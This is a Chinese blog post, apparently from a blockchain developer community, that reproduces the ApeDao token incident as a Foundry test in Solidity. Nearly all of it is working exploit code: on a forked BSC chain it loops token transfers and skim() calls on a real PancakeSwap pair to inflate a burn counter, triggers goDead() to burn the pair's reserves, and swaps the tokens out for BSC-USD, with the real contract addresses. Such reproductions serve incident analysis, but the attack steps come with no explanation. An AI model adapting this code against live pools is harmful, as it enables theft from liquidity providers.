ApeDao事件代码复现

  • Archime
  • 更新于 2023-07-20 16:17
  • 阅读 2682

ApeDao事件代码复现

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;

import "forge-std/Test.sol";
import "./interface.sol";

interface IAPEDAO is IERC20 {
    function amountToDead() view external returns (uint256);
    function goDead() external;
}

contract BNOTest is Test {
    IAPEDAO apedao = IAPEDAO(0xB47955B5B7EAF49C815EBc389850eb576C460092);

    IPancakeRouter pancakeRouter = IPancakeRouter(payable(0x10ED43C718714eb63d5aA57B78B54704E256024E));
    IPancakePair pancakePair = IPancakePair(payable(0xee2a9D05B943C1F33f3920C750Ac88F74D0220c3));
    IERC20 bscusd = IERC20(0x55d398326f99059fF775485246999027B3197955);

    CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);

    function setUp() public {
        cheats.createSelectFork("bsc", 30072293);
        cheats.label(address(apedao),"apedao");

    }

    function testExploit() public {
        deal(address(apedao),address(this),2238674491718649997652);
        emit log_named_decimal_uint("After deal attacker apedao number", apedao.balanceOf(address(this)) , apedao.decimals());
        emit log_named_decimal_uint("Before attack amountToDead number ", apedao.amountToDead() , apedao.decimals());

        for(uint256 i=0;i<16;i++){
            apedao.transfer(address(pancakePair),apedao.balanceOf(address(this)));
            pancakePair.skim(address(this));
        }

        emit log_named_decimal_uint("After attack amountToDead number ", apedao.amountToDead() , apedao.decimals());
        emit log_named_decimal_uint("After attack attacker apedao number", apedao.balanceOf(address(this)) , apedao.decimals());

        emit log_named_decimal_uint("Before godead pancakePair apedao number ", apedao.balanceOf(address(pancakePair)) , apedao.decimals());
        apedao.goDead();
        emit log_named_decimal_uint("After godead pancakePair apedao number ", apedao.balanceOf(address(pancakePair)) , apedao.decimals());

        swap();

    }

    function swap() internal {

        address[] memory path = new address[](2);
        path[0] = address(apedao);
        path[1] = address(bscusd);

        uint256[] memory amounts = new uint256[](2);

        amounts = pancakeRouter.getAmountsOut(apedao.balanceOf(address(this)),path);
        apedao.transfer(address(pancakePair),apedao.balanceOf(address(this)));

        pancakePair.swap(amounts[1]*90/100,0,address(this),"");

        emit log_named_decimal_uint("After attack bscusd balance  ", bscusd.balanceOf(address(this)) , bscusd.decimals());

    }

}
点赞 0
收藏 1
分享
本文参与登链社区写作激励计划 ,好文好收益,欢迎正在阅读的你也加入。

0 条评论

请先 登录 后评论
Archime
Archime
0x96C4...508C
江湖只有他的大名,没有他的介绍。